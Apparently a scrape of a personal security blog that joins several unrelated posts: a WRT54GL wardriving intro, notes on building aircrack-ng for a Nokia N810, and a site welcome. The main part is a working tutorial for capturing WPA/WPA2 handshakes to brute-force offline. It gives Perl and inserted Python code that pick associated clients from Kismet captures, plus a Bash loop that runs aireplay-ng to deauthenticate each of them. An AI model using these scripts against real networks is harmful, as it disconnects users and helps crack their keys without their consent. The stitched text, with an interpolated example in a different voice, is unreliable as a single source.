Well, the WRT54GL is not dead for me. Due to its popularity, this venerable wireless router has been documented across the Internet, covering both software and hardware hacks. Tinkering with this device is a great way to learn about embedded Linux, cross-compilation, soldering, and serial communication. I continue to search for new ways to play with this router (I plan on adding some USB ports once my 12V/5V power supply arrives!). The reason I'm documenting my experiences is that I haven't seen many tutorials where the device has a GPS module. I've seen some documentation on connecting a GPS device (Garmin) to a serial port. Mine goes the extra step and includes the module inside the router for a nice compact wardriving box. I'm even able to set the date and time on the device after a GPS lock is obtained. So I'm going to put together a tutorial on the GPS module and the versions of OpenWrt, Kismet, and gpsd I used to make this device a self-contained wardriving box.
This tutorial will help you configure the Scratchbox environment to compile the latest SVN of aircrack-ng, the latest stable Kismet, and Reaver 1.4 for the Nokia N810. A lot of love is being sent to the N900, but the N8x0 series of devices is still great for wireless testing. With this tutorial you will be able to compile the software and create Debian packages for easy installation on your Nokia device. Of particular note are the errors I encountered while compiling aircrack-ng. The error had not been documented on the Internet; trust me, I Googled my heart out. Everyone's solution was to update the Linux kernel headers. Well, in this case that wasn't possible. I'm not a Linux programmer, but I figured out how to edit the header file to make the changes needed to get aircrack-ng to compile.
This post deals with gathering the information you need before using aircrack-ng to capture a WPA/WPA2 handshake for an offline brute-force attack. When running aireplay-ng to send de-authentication packets you need the MAC address of the access point (its BSSID) and of a client that is associated with it: the deauth forces that client to reconnect, and the reconnection produces the four-way handshake that airodump-ng captures. The way I would collect the information is to run Kismet. With the older version of Kismet I would monitor the client (panel view) and select (copy/paste) the access point and client MACs. With the new version of Kismet you cannot select a MAC address, so I wrote myself a quick Perl script to parse the Kismet NETXML file and output the MAC addresses of each AP and associated-client pair.
#!/usr/bin/perl
# Parse a Kismet .netxml file and print one "BSSID CLIENT-MAC" line for every
# associated client of a WPA/WPA2 infrastructure network.
use strict;
use warnings;
use XML::Simple;

my $file = shift @ARGV or die "usage: $0 FILE.netxml\n";

# ForceArray keeps single elements as one-element lists, so a network with only
# one client or only one <encryption> entry is not silently skipped.
my $xs = XML::Simple->new(
    KeyAttr    => [],
    ForceArray => [ 'wireless-network', 'SSID', 'encryption', 'wireless-client' ],
);
my $data = $xs->XMLin($file);

for my $wn ( @{ $data->{'wireless-network'} || [] } ) {
    next unless ( $wn->{'type'} // '' ) eq 'infrastructure';
    my $bssid = $wn->{'BSSID'};

    # Kismet lists every cipher/auth combination it saw (WPA+PSK, WPA+AES-CCM, ...);
    # any entry starting with WPA marks the network as WPA/WPA2.
    my @enc = map { @{ $_->{'encryption'} || [] } } @{ $wn->{'SSID'} || [] };
    next unless grep { /^WPA/ } @enc;

    for my $wc ( @{ $wn->{'wireless-client'} || [] } ) {
        # 'tods' clients have sent frames to the AP, i.e. they are associated
        next unless ( $wc->{'type'} // '' ) eq 'tods';
        print "$bssid $wc->{'client-mac'}\n";
    }
}
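As an added example (not code from the original post), here is the same extraction in Python using the standard library's xml.etree, with a constructed .netxml sample laid out the way Kismet writes it (the tag and attribute names follow Kismet's netxml format; the MAC addresses and ESSIDs are made up, not a real capture). It goes slightly beyond the Perl script: it also accepts clients Kismet marks 'established' (bidirectional traffic with the AP), it handles a network with a single client or a single encryption entry, and it emits the two-field lines the Bash loop below reads.

```python
"""Extract (BSSID, client MAC) pairs for WPA/WPA2 APs from a Kismet .netxml file.

Added example, not the original post's script: the Perl version above is
reimplemented with xml.etree so the tag layout is explicit.
"""
import sys
import xml.etree.ElementTree as ET

# Kismet tags each client by the direction of traffic it saw. 'tods' and
# 'established' clients have sent frames to the AP, so they are associated and
# worth deauthenticating; 'fromds' may be a station the AP merely addressed.
ASSOCIATED_TYPES = {"tods", "established"}


def wpa_client_pairs(netxml_text):
    """Return [(bssid, client_mac, channel), ...] for WPA/WPA2 infrastructure
    networks that have at least one associated client."""
    root = ET.fromstring(netxml_text)
    pairs = []
    for net in root.iter("wireless-network"):
        if net.get("type") != "infrastructure":
            continue
        # Each <SSID> block lists every cipher/auth combination Kismet saw
        # (WPA+PSK, WPA+AES-CCM, ...); one WPA entry is enough.
        encs = [e.text or "" for e in net.findall("SSID/encryption")]
        if not any(e.startswith("WPA") for e in encs):
            continue
        bssid = net.findtext("BSSID")
        channel = net.findtext("channel")
        for client in net.findall("wireless-client"):
            if client.get("type") not in ASSOCIATED_TYPES:
                continue
            mac = client.findtext("client-mac")
            if bssid and mac:
                pairs.append((bssid, mac, channel))
    return pairs


def pairs_file_lines(pairs):
    """Format pairs as 'BSSID CLIENT-MAC' lines, the layout the Bash loop reads."""
    return [f"{bssid} {mac}" for bssid, mac, _channel in pairs]


# Constructed sample in the shape of a Kismet newcore .netxml file (not a real capture).
SAMPLE_NETXML = """<?xml version="1.0"?>
<detection-run kismet-version="2011.03.R2" start-time="Sat Jan  1 12:00:00 2011">
  <wireless-network number="1" type="infrastructure">
    <SSID>
      <type>Beacon</type>
      <encryption>WPA+PSK</encryption>
      <encryption>WPA+AES-CCM</encryption>
      <essid cloaked="false">home-wpa</essid>
    </SSID>
    <BSSID>00:11:22:33:44:55</BSSID>
    <channel>6</channel>
    <wireless-client number="1" type="tods">
      <client-mac>AA:BB:CC:DD:EE:01</client-mac>
    </wireless-client>
    <wireless-client number="2" type="fromds">
      <client-mac>AA:BB:CC:DD:EE:02</client-mac>
    </wireless-client>
  </wireless-network>
  <wireless-network number="2" type="infrastructure">
    <SSID>
      <type>Beacon</type>
      <encryption>WPA+PSK</encryption>
      <essid cloaked="false">single-enc</essid>
    </SSID>
    <BSSID>00:11:22:33:44:66</BSSID>
    <channel>11</channel>
    <wireless-client number="1" type="established">
      <client-mac>AA:BB:CC:DD:EE:03</client-mac>
    </wireless-client>
  </wireless-network>
  <wireless-network number="3" type="infrastructure">
    <SSID>
      <type>Beacon</type>
      <encryption>WEP</encryption>
      <essid cloaked="false">old-wep</essid>
    </SSID>
    <BSSID>00:11:22:33:44:77</BSSID>
    <channel>1</channel>
    <wireless-client number="1" type="tods">
      <client-mac>AA:BB:CC:DD:EE:04</client-mac>
    </wireless-client>
  </wireless-network>
  <wireless-network number="4" type="probe">
    <SSID><type>Probe Request</type><encryption>None</encryption></SSID>
    <BSSID>AA:BB:CC:DD:EE:05</BSSID>
    <channel>0</channel>
  </wireless-network>
</detection-run>
"""

if __name__ == "__main__":
    # Usage: python netxml_pairs.py Kismet-capture.netxml > pairs.txt
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NETXML
    print("\n".join(pairs_file_lines(wpa_client_pairs(text))))
```

Run against the sample it prints the two WPA pairs and drops the WEP network, the probe entry and the 'fromds' client. The channel is kept in the tuples so you can point airodump-ng at the right channel before running the deauth loop. xml.etree is fine for a .netxml file you captured yourself; for XML from an untrusted source use a hardened parser such as defusedxml.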
I then feed the file that was created to a simple Bash script that uses aireplay-ng to knock all the listed clients offline. Of course you should already have airodump-ng listening on the target AP's channel for the WPA/WPA2 handshakes.
#!/bin/bash
# Deauthenticate every "BSSID CLIENT-MAC" pair in the file produced by the
# Perl script above. airodump-ng should already be capturing on the AP's channel.
set -x
AIREPLAY=/usr/local/sbin/aireplay-ng
WIFACE=$1   # monitor-mode interface (e.g. mon0)
FILE=$2     # file of "BSSID CLIENT-MAC" lines
[ $# -eq 2 ] || { echo "usage: $0 <monitor-iface> <pairs-file>" >&2; exit 1; }
while read -r bssid clientmac
do
    [ -n "$clientmac" ] || continue   # skip blank or malformed lines
    echo "$bssid $clientmac"
    # -0 1: one deauth burst; -a: AP BSSID; -c: client to kick off
    "$AIREPLAY" -0 1 -a "$bssid" -c "$clientmac" --ignore-negative-one "$WIFACE"
done < "$FILE"
Welcome to jedge.com. I'm James Edge, the host of this site. My goal for this site is to create a collaborative portal for documents, links, and thoughts regarding auditing Information System security at a state government level. I've been working in state government for a few years with both New York and Georgia, and I hope to express my thoughts and opinions related to auditing based on what I've experienced working for those governments. Enjoy the site and feel free to post a comment for whatever reason. I hope the feedback I receive will further improve the site. Thanks.